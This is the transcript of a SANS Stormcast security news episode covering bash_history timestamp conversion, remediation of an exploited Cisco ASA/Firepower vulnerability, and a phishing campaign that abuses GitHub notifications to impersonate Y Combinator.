SANS Stormcast Monday, September 29th, 2025: Convert Timestamps; Cisco Compromises; GitHub Notification Phishing

If you are not able to play the podcast using the player below: Use this direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9632.mp3

previous

Convert Timestamps; Cisco Compromises; GitHub Notification Phishing

00:00

iTunes

MP3 Download

RSS Feed

Google

Podbean

Amazon Echo

YouTube

Spreaker

Spotify

Discussion

Login here to join the discussion.

Podcast Transcript

 Hello and welcome to the Monday, September 29th, 2025
 edition of the SANS Internet Storm Center's Stormcast. My
 name is Johannes Ullrich, recording today from
 Jacksonville, Florida. And this episode is brought to you
 by the SANS.edu Graduate Certificate Program in
 Industrial Control System Security. A quick script from
 Jim this weekend for anybody doing forensics, incident
 response, something to convert the Unix timestamps in 
 .bash_history files to a more human-readable ISO format. Adding
 timestamps to .bash_history is obviously useful in incident
 response. If it's not done by your system, all you have to
 do is add a hist time format variable to your .bashrc or a
 similar file. And with that, you basically define the
 format. It's often defined as a Unix timestamp. Part of this
 is to make it easy to sort. The file is being written
 whenever a shell exits. So if you have multiple shells
 running around the same time, well, these particular
 commands may not necessarily be in time order as they're
 being saved to the file. And of course, the usual caveats
 about this file being potentially manipulated or
 disabled by an attacker applies. And then we still
 have to talk about the Cisco vulnerability that I mentioned
 last week. The vulnerability that had already been
 exploited. So again, this affects the ASA and firepower
 devices. Note that exploitation of the devices
 likely started about a year ago. So I've seen numbers in
 news articles and sort of mentioned 2 million affected
 devices. Now note that these are potentially vulnerable
 devices, not exploited device. I think that distinction
 sometimes got lost in some of the articles that I've seen.
 At this point, there's only a very small number of actual
 exploited devices as far as I've seen. And the exploit
 itself is not public yet. And from everything I heard is not
 trivial. So still, you do want a patch, of course. And now
 there's the raison to find an exploit and make it public for
 a wannabe like that. But overall, the chances that you
 were exploited before the actual patch was released
 aren't that super high. Unless you're sort of knowing
 something that you would consider yourself as targeted.
 In particular, by Chinese state-sponsored actor. Now we
 have a number of write-ups around this. I want to point
 out CISA's one. CISA also offers its malware next-gen
 portal to detect infected systems. The way this works is
 that you create a core dump on your particular Cisco device.
 And then upload it to CISA for automatic analysis. Now CISA's
 advice, as always, is focusing on the U.S. federal
 government. But typically, of course, their advice is well
 -sourced and well-thought-out. So definitely something that
 you should consider. As far as uploading malware to the
 malware next-gen portal goes, you must be registered with
 the portal. That means login.gov. So this is restricted at
 this point to U.S. citizens. But you do not have to be
 affiliated with the U.S. federal government. You just
 have to basically figure out if that's something that you
 want to do or not. Not all ASA devices have patches
 available. There are some affected ASA devices that are
 end-of-life. And the only option for those is, of
 course, to replace them with newer models. It is critical
 you get patching now before we have any more widespread
 exploitation of this. According to Cisco, affected
 devices have been found with modified ROM monitor, or short
 often called ROMMON. This is firmware that is basically
 sort of the run during boot. And by modifying the ROMMON,
 the malware is able to persist reboots and also some software
 updates. However, the specific update released by Cisco in
 this case will specifically scan ROMMON and apply a fix
 if it finds it to be modified. A firmware-update.log file is
 left in that case on disk zero. So if it found something
 odd with ROMMON, and Cisco recommends that if that's the
 case, if you see the firmware-update.log file, you must
 assume the device is compromised. You must change
 passports, keys, certificates. Remember, we had that issue
 many times before. For devices like this were compromised.
 And then even two-factor authentication seats and such
 were stolen. Not sure the two-factor authentication seat is
 an issue here with these particular Cisco devices. And
 Cisco also requests that any user who runs into an infected
 device does open a ticket with customer support for further
 help and also advice and analysis of what exactly
 happened there. Your device is considered vulnerable if it
 has the VPN web services enabled. So if you don't have
 the VPN web service enabled, then you shouldn't be
 vulnerable. Of course, you may have had it enabled in the
 past or such. That can sometimes be a little bit
 difficult to figure out and distinguish. I'll add links to
 the Cisco advisory as well as to CISAs in the show notes. So
 if you want to read up on some details that either are
 published, take a look at that. And like I said, this is
 something that this week you really have to get a handle on
 whether or not you're vulnerable. Apply the patches
 and then make sure that you haven't already been
 exploited. The target group is not necessarily just the
 government networks. In the past, we have seen some
 private entities like either suppliers or even law firms in
 some cases being hit by malware like this. And talk
 about some more targeted attacks. The next attack is
 also a bit targeted. And this is the use of GitHub
 notifications that are being abused. Based on GitHub, if a
 user is mentioned in an issue, GitHub notifies the user of
 the issue via email. Sadly, these notifications are
 customizable enough to make it difficult to distinguish these
 fraud notifications from other email. Bleeping Computer is
 reporting that the latest wave of these attacks was used to
 impersonate the startup accelerator YCombinator. And
 the target here apparently were crypto coin related
 companies. And the lure consists of an email notifying
 the victim of being accepted for funding from YCombinator.
 I think they offered something like $15 million. That, of
 course, entices most startup founders and such to click on
 those emails. And in this case, the email was then led
 to a YCombinator lookalike website that then made them
 install some malware that trained their cryptocurrency
 accounts. This is something that's always a little bit
 hard to sort of put into awareness presentation such
 that you have a little bit of more targeted attack like
 this. Where they're using systems like GitHub that many
 of these founders and people associated with startups are
 more or less trusting. And then, of course, YCombinator
 being something that many of them have probably applied for
 funding for. Well, and that's it for today. So thanks for
 listening and thanks for recommending, for liking this
 podcast. Also, thanks for anybody who is leaving a good
 comment. That's it for today and talk to you again
 tomorrow. Bye.